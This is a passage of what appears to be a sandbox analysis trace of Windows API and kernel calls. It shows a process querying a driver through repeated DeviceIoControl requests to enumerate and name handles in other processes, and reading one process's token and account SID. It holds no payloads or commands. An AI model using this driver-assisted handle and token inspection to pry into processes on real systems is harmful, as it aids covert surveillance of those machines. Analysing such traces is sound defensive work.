ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.679] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xf [0226.679] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.679] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.679] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.679] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0226.680] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.680] PsAcquireProcessExitSynchronization () returned 0x0 [0226.680] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0) [0226.680] ObReferenceObjectByHandle (in: Handle=0x114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ea7620, HandleInformation=0x0) returned 0x0 [0226.680] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.680] PsReleaseProcessExitSynchronization () returned 0x2 [0226.680] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3d [0226.680] ObQueryNameString (in: Object=0xfffffa8001ea7620, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.680] ObfDereferenceObject (Object=0xfffffa8001ea7620) returned 0x1 [0226.680] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.680] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.680] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.680] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0226.680] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.680] PsAcquireProcessExitSynchronization () returned 0x0 [0226.680] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0) [0226.680] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e80e80, HandleInformation=0x0) returned 0x0 [0226.680] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.680] PsReleaseProcessExitSynchronization () returned 0x2 [0226.680] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3d [0226.680] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.680] ObfDereferenceObject (Object=0xfffffa8001e80e80) returned 0x1 [0226.680] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.680] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.680] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.680] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0226.680] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.680] PsAcquireProcessExitSynchronization () returned 0x0 [0226.680] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0) [0226.680] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001febe60, HandleInformation=0x0) returned 0x0 [0226.680] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.680] PsReleaseProcessExitSynchronization () returned 0x2 [0226.681] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3d [0226.681] ObQueryNameString (in: Object=0xfffffa8001febe60, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.681] ObfDereferenceObject (Object=0xfffffa8001febe60) returned 0x10 [0226.681] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.681] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.681] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0226.681] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.681] PsAcquireProcessExitSynchronization () returned 0x0 [0226.681] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0) [0226.681] ObReferenceObjectByHandle (in: Handle=0x1cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0226.681] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.681] PsReleaseProcessExitSynchronization () returned 0x2 [0226.681] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3d [0226.681] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.681] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa4c) returned 0xc8 [0226.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.681] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800202c060, HandleInformation=0x0) returned 0x0 [0226.681] ObOpenObjectByPointer (in: Object=0xfffffa800202c060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.681] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x20 [0226.681] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.682] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.682] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.682] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.682] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.683] CloseHandle (hObject=0xc4) returned 1 [0226.683] CloseHandle (hObject=0xc8) returned 1 [0226.683] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.683] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0226.683] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.683] PsAcquireProcessExitSynchronization () returned 0x0 [0226.683] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.683] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f0c7d0, HandleInformation=0x0) returned 0x0 [0226.683] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.684] PsReleaseProcessExitSynchronization () returned 0x2 [0226.684] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.684] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.684] ObfDereferenceObject (Object=0xfffffa8001f0c7d0) returned 0x1 [0226.684] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.684] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.684] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.684] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0226.684] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.684] PsAcquireProcessExitSynchronization () returned 0x0 [0226.684] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.684] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80021a3b20, HandleInformation=0x0) returned 0x0 [0226.684] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.684] PsReleaseProcessExitSynchronization () returned 0x2 [0226.684] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.684] ObQueryNameString (in: Object=0xfffffa80021a3b20, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.684] ObfDereferenceObject (Object=0xfffffa80021a3b20) returned 0x1 [0226.684] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.684] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.684] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.684] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.684] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.684] PsAcquireProcessExitSynchronization () returned 0x0 [0226.684] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.684] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.684] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.684] PsReleaseProcessExitSynchronization () returned 0x2 [0226.684] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.684] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.684] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.684] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.685] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.685] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.685] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.685] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.685] PsAcquireProcessExitSynchronization () returned 0x0 [0226.685] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.685] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e99070, HandleInformation=0x0) returned 0x0 [0226.685] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.685] PsReleaseProcessExitSynchronization () returned 0x2 [0226.685] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.685] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.685] ObfDereferenceObject (Object=0xfffffa8001e99070) returned 0x1 [0226.685] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.685] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.685] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.685] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.685] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.685] PsAcquireProcessExitSynchronization () returned 0x0 [0226.685] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.685] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00109f320, HandleInformation=0x0) returned 0x0 [0226.685] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.685] PsReleaseProcessExitSynchronization () returned 0x2 [0226.685] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.685] ObQueryNameString (in: Object=0xfffff8a00109f320, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.685] ObfDereferenceObject (Object=0xfffff8a00109f320) returned 0x1 [0226.686] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.686] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.686] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0226.686] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.686] PsAcquireProcessExitSynchronization () returned 0x0 [0226.686] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.686] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a23250, HandleInformation=0x0) returned 0x0 [0226.686] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.686] PsReleaseProcessExitSynchronization () returned 0x2 [0226.686] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.686] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.686] ObfDereferenceObject (Object=0xfffffa8003a23250) returned 0x1 [0226.686] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.686] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.686] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0226.686] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.686] PsAcquireProcessExitSynchronization () returned 0x0 [0226.686] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.687] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002814f20, HandleInformation=0x0) returned 0x0 [0226.687] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.687] PsReleaseProcessExitSynchronization () returned 0x2 [0226.687] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.687] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.687] ObfDereferenceObject (Object=0xfffffa8002814f20) returned 0x1 [0226.687] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.687] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.687] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.687] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0226.687] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.687] PsAcquireProcessExitSynchronization () returned 0x0 [0226.687] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.687] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0226.687] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.687] PsReleaseProcessExitSynchronization () returned 0x2 [0226.687] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.687] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.687] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0226.687] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.687] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.687] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.687] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0226.688] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.688] PsAcquireProcessExitSynchronization () returned 0x0 [0226.688] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.688] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80019db970, HandleInformation=0x0) returned 0x0 [0226.688] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.688] PsReleaseProcessExitSynchronization () returned 0x2 [0226.688] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.688] ObQueryNameString (in: Object=0xfffffa80019db970, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.688] ObfDereferenceObject (Object=0xfffffa80019db970) returned 0x1 [0226.688] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.688] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.688] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.688] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0226.688] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.688] PsAcquireProcessExitSynchronization () returned 0x0 [0226.688] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.688] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0226.688] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.688] PsReleaseProcessExitSynchronization () returned 0x2 [0226.688] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.688] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.688] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0226.688] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.688] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.688] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.688] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: 